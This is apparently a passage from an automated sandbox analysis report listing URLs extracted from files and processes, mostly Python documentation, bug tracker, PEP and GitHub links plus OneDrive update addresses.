Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34829
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34850
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34898
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35047
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35059
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35081
Source: 3.8.html.17.dr, 3.11.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35134
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35153
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35224
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35283
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35345
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35431
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35459
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35471
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35537
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35582
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35606
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35664
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35702
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35713
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35766
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35810
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35813
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35864
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35884
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35886
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35892
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35900
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=35904
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36004
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36012
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36016
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36018
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36027
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36048
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36084
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36085
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36127
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36264
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36268
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36297
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36320
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36326
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36348
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36381
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36384
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36465
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36475
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36492
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36540
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36546
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36588
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36623
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36669
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36673
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36676
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36707
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36721
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36722
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36728
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36763
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36772
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36785
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36793
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36817
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36829
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36887
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36895
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36917
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36921
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36933
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36952
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36974
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=36999
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37007
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37027
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37028
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37032
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37128
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37178
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37221
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37228
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37351
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37412
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37481
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37627
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37765
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37819
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37834
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37951
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=37966
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=38234
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=38944
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4136
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4195
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4201
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4258
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4285
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=42967
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4384
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=43882
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4603
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4688
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4707
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4739
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4753
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4868
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=4910
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5084
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5150
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5175
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5228
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5237
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5630
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5675
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5680
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=5914
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6137
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=6584
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=9372
Source: whatnow.html.17.drString found in binary or memory: https://code.activestate.com/recipes/langs/python/
Source: unittest.mock-examples.html.17.drString found in binary or memory: https://code.google.com/archive/p/mock/issues/105
Source: 3.1.html.17.drString found in binary or memory: https://codereview.appspot.com/53094
Source: powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: tkinter.ttk.html.17.drString found in binary or memory: https://core.tcl.tk/tips/doc/trunk/tip/48.md
Source: 3.8.html.17.dr, 3.11.html.17.drString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10735
Source: 3.8.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3986.html
Source: uuid.html.17.dr, 2.5.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc4122.html
Source: macos.py.17.drString found in binary or memory: https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgra
Source: general.html.17.drString found in binary or memory: https://devguide.python.org/
Source: general.html.17.drString found in binary or memory: https://devguide.python.org/developer-workflow/development-cycle/
Source: 3.8.html.17.drString found in binary or memory: https://devguide.python.org/development-tools/clinic/
Source: general.html.17.drString found in binary or memory: https://devguide.python.org/setup/
Source: unix.html0.17.drString found in binary or memory: https://devguide.python.org/setup/#get-the-source-code
Source: unix.html0.17.drString found in binary or memory: https://docs.fedoraproject.org/en-US/package-maintainers/Packaging_Tutorial_GNU_Hello/
Source: whatnow.html.17.dr, 2.5.html.17.drString found in binary or memory: https://docs.python.org
Source: base64.py.17.drString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: general.html.17.drString found in binary or memory: https://docs.python.org/3/
Source: editors.html.17.dr, embedding.html.17.dr, xml.sax.handler.html.17.dr, xml.sax.reader.html.17.dr, unittest.mock.html.17.dr, coro.html.17.dr, gen.html.17.dr, capsule.html.17.dr, 3.8.html.17.dr, uuid.html.17.dr, typeobj.html.17.dr, interactive.html.17.dr, perfmaps.html.17.dr, unicode.html.17.dr, init_config.html.17.dr, contents.html.17.dr, general.html.17.dr, interpreter.html.17.dr, tkinter.ttk.html.17.dr, slice.html.17.dr, long.html.17.drString found in binary or memory: https://docs.python.org/3/_static/og-image.png
Source: capsule.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/capsule.html
Source: coro.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/coro.html
Source: gen.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/gen.html
Source: hash.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/hash.html
Source: import.html0.17.drString found in binary or memory: https://docs.python.org/3/c-api/import.html
Source: init_config.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/init_config.html
Source: long.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/long.html
Source: perfmaps.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/perfmaps.html
Source: slice.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/slice.html
Source: typeobj.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/typeobj.html
Source: unicode.html.17.drString found in binary or memory: https://docs.python.org/3/c-api/unicode.html
Source: contents.html.17.drString found in binary or memory: https://docs.python.org/3/contents.html
Source: general.html.17.drString found in binary or memory: https://docs.python.org/3/download.html
Source: embedding.html.17.drString found in binary or memory: https://docs.python.org/3/extending/embedding.html
Source: general.html.17.drString found in binary or memory: https://docs.python.org/3/faq/general.html
Source: genindex-I.html.17.drString found in binary or memory: https://docs.python.org/3/genindex-I.html
Source: genindex-K.html.17.drString found in binary or memory: https://docs.python.org/3/genindex-K.html
Source: genindex-Q.html.17.drString found in binary or memory: https://docs.python.org/3/genindex-Q.html
Source: genindex-S.html.17.drString found in binary or memory: https://docs.python.org/3/genindex-S.html
Source: genindex-Symbols.html.17.drString found in binary or memory: https://docs.python.org/3/genindex-Symbols.html
Source: core.cpython-312.pyc.17.drString found in binary or memory: https://docs.python.org/3/library/re.html
Source: core.cpython-312.pyc.17.drString found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: tkinter.font.html.17.drString found in binary or memory: https://docs.python.org/3/library/tkinter.font.html
Source: tkinter.ttk.html.17.drString found in binary or memory: https://docs.python.org/3/library/tkinter.ttk.html
Source: unittest.mock-examples.html.17.drString found in binary or memory: https://docs.python.org/3/library/unittest.mock-examples.html
Source: unittest.mock.html.17.drString found in binary or memory: https://docs.python.org/3/library/unittest.mock.html
Source: uuid.html.17.drString found in binary or memory: https://docs.python.org/3/library/uuid.html
Source: xml.etree.elementtree.html.17.drString found in binary or memory: https://docs.python.org/3/library/xml.etree.elementtree.html
Source: xml.sax.handler.html.17.drString found in binary or memory: https://docs.python.org/3/library/xml.sax.handler.html
Source: xml.sax.reader.html.17.drString found in binary or memory: https://docs.python.org/3/library/xml.sax.reader.html
Source: general.html.17.drString found in binary or memory: https://docs.python.org/3/license.html
Source: introduction.html.17.drString found in binary or memory: https://docs.python.org/3/reference/introduction.html
Source: toplevel_components.html.17.drString found in binary or memory: https://docs.python.org/3/reference/toplevel_components.html
Source: search.html.17.drString found in binary or memory: https://docs.python.org/3/search.html
Source: floatingpoint.html.17.drString found in binary or memory: https://docs.python.org/3/tutorial/floatingpoint.html
Source: interactive.html.17.drString found in binary or memory: https://docs.python.org/3/tutorial/interactive.html
Source: interpreter.html.17.drString found in binary or memory: https://docs.python.org/3/tutorial/interpreter.html
Source: whatnow.html.17.drString found in binary or memory: https://docs.python.org/3/tutorial/whatnow.html
Source: editors.html.17.drString found in binary or memory: https://docs.python.org/3/using/editors.html
Source: unix.html0.17.drString found in binary or memory: https://docs.python.org/3/using/unix.html
Source: 3.1.html.17.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.1.html
Source: 3.11.html.17.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.11.html
Source: 3.8.html.17.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.8.html
Source: unix.html0.17.drString found in binary or memory: https://en.opensuse.org/Portal:Packaging
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF1305F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13003000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1822470393.000001EF13048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: perfmaps.html.17.drString found in binary or memory: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/tools/perf/Documentation/jit
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: __init__.py.17.drString found in binary or memory: https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev
Source: cmdline.py.17.dr, cmdline.cpython-312.pyc.17.drString found in binary or memory: https://github.com/pygments/pygments/issues
Source: wheel.py.17.drString found in binary or memory: https://github.com/pypa/pip/issues/1150)
Source: req_file.cpython-312.pyc.17.drString found in binary or memory: https://github.com/pypa/pip/pull/3514
Source: egg_link.cpython-312.pyc.17.drString found in binary or memory: https://github.com/pypa/setuptools/issues/4167).
Source: general.html.17.drString found in binary or memory: https://github.com/python/cpython/
Source: capsule.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/capsule.rst
Source: coro.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/coro.rst
Source: gen.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/gen.rst
Source: hash.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/hash.rst
Source: import.html0.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/import.rst
Source: init_config.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/init_config.rst
Source: long.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/long.rst
Source: perfmaps.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/perfmaps.rst
Source: slice.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/slice.rst
Source: typeobj.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/typeobj.rst
Source: unicode.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/unicode.rst
Source: contents.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/contents.rst
Source: embedding.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/extending/embedding.rst
Source: general.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/faq/general.rst
Source: tkinter.font.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tkinter.font.rst
Source: tkinter.ttk.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tkinter.ttk.rst
Source: unittest.mock-examples.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/unittest.mock-examples.rst
Source: unittest.mock.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/unittest.mock.rst
Source: uuid.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/uuid.rst
Source: xml.etree.elementtree.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.etree.elementtree.rst
Source: xml.sax.handler.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.sax.handler.rst
Source: xml.sax.reader.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.sax.reader.rst
Source: introduction.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/reference/introduction.rst
Source: toplevel_components.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/reference/toplevel_components.rst
Source: floatingpoint.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/floatingpoint.rst
Source: interactive.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/interactive.rst
Source: interpreter.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/interpreter.rst
Source: whatnow.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/whatnow.rst
Source: editors.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/using/editors.rst
Source: unix.html0.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/using/unix.rst
Source: 3.1.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.1.rst
Source: 3.11.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.11.rst
Source: 3.8.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.8.rst
Source: general.html.17.drString found in binary or memory: https://github.com/python/cpython/issues
Source: 3.8.html.17.drString found in binary or memory: https://github.com/python/cpython/issues/83571
Source: 3.8.html.17.drString found in binary or memory: https://github.com/python/cpython/issues/83743
Source: 3.8.html.17.drString found in binary or memory: https://github.com/python/cpython/issues/85272
Source: 3.8.html.17.drString found in binary or memory: https://github.com/python/cpython/issues/87451
Source: tkinter.font.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tkinter/font.py
Source: tkinter.ttk.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tkinter/ttk.py
Source: unittest.mock.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.py
Source: uuid.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/uuid.py
Source: xml.etree.elementtree.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/etree/ElementTree.py
Source: xml.sax.handler.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/sax/handler.py
Source: xml.sax.reader.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/sax/xmlreader.py
Source: unix.html0.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/README.rst
Source: api.py0.17.drString found in binary or memory: https://httpbin.org/get
Source: general.html.17.drString found in binary or memory: https://infra.psf.io
Source: interactive.html.17.drString found in binary or memory: https://ipython.org/
Source: general.html.17.drString found in binary or memory: https://ir.cwi.nl/pub/18204
Source: introduction.html.17.drString found in binary or memory: https://ironpython.net/
Source: decoder.cpython-312.pyc.17.dr, decoder.py.17.drString found in binary or memory: https://json.org
Source: 3.1.html.17.drString found in binary or memory: https://json.org/
Source: floatingpoint.html.17.drString found in binary or memory: https://jvns.ca/blog/2023/01/13/examples-of-floating-point-problems/
Source: general.html.17.drString found in binary or memory: https://mail.python.org/mailman/listinfo/python-list
Source: general.html.17.drString found in binary or memory: https://mail.python.org/mailman3/lists/python-announce-list.python.org/
Source: general.html.17.drString found in binary or memory: https://mail.python.org/mailman3/lists/python-dev.python.org/
Source: whatnow.html.17.drString found in binary or memory: https://mail.python.org/pipermail/
Source: powershell.exe, 00000008.00000002.2431123146.00000257417A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: general.html.17.drString found in binary or memory: https://peps.python.org/
Source: general.html.17.drString found in binary or memory: https://peps.python.org/pep-0005/
Source: editors.html.17.dr, controlflow.html.17.drString found in binary or memory: https://peps.python.org/pep-0008/
Source: 3.1.html.17.dr, 2.5.html.17.drString found in binary or memory: https://peps.python.org/pep-0302/
Source: 3.1.html.17.drString found in binary or memory: https://peps.python.org/pep-0372/
Source: general.html.17.drString found in binary or memory: https://peps.python.org/pep-0373/
Source: 3.1.html.17.drString found in binary or memory: https://peps.python.org/pep-0378/
Source: unicode.html.17.drString found in binary or memory: https://peps.python.org/pep-0383/
Source: general.html.17.drString found in binary or memory: https://peps.python.org/pep-0387/
Source: unicode.html.17.drString found in binary or memory: https://peps.python.org/pep-0393/
Source: init_config.html.17.drString found in binary or memory: https://peps.python.org/pep-0432/
Source: typeobj.html.17.dr, 3.4.html.17.drString found in binary or memory: https://peps.python.org/pep-0442/
Source: hash.html.17.dr, 3.4.html.17.drString found in binary or memory: https://peps.python.org/pep-0456/
Source: 3.8.html.17.dr, 3.11.html.17.dr, 3.12.html.17.dr, controlflow.html.17.drString found in binary or memory: https://peps.python.org/pep-0484/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0526/
Source: init_config.html.17.drString found in binary or memory: https://peps.python.org/pep-0528/
Source: 3.8.html.17.dr, unicode.html.17.drString found in binary or memory: https://peps.python.org/pep-0529/
Source: init_config.html.17.drString found in binary or memory: https://peps.python.org/pep-0538/
Source: init_config.html.17.drString found in binary or memory: https://peps.python.org/pep-0540/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0544/
Source: init_config.html.17.dr, 3.11.html.17.drString found in binary or memory: https://peps.python.org/pep-0552/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0570/
Source: 3.8.html.17.dr, 3.12.html.17.drString found in binary or memory: https://peps.python.org/pep-0572/
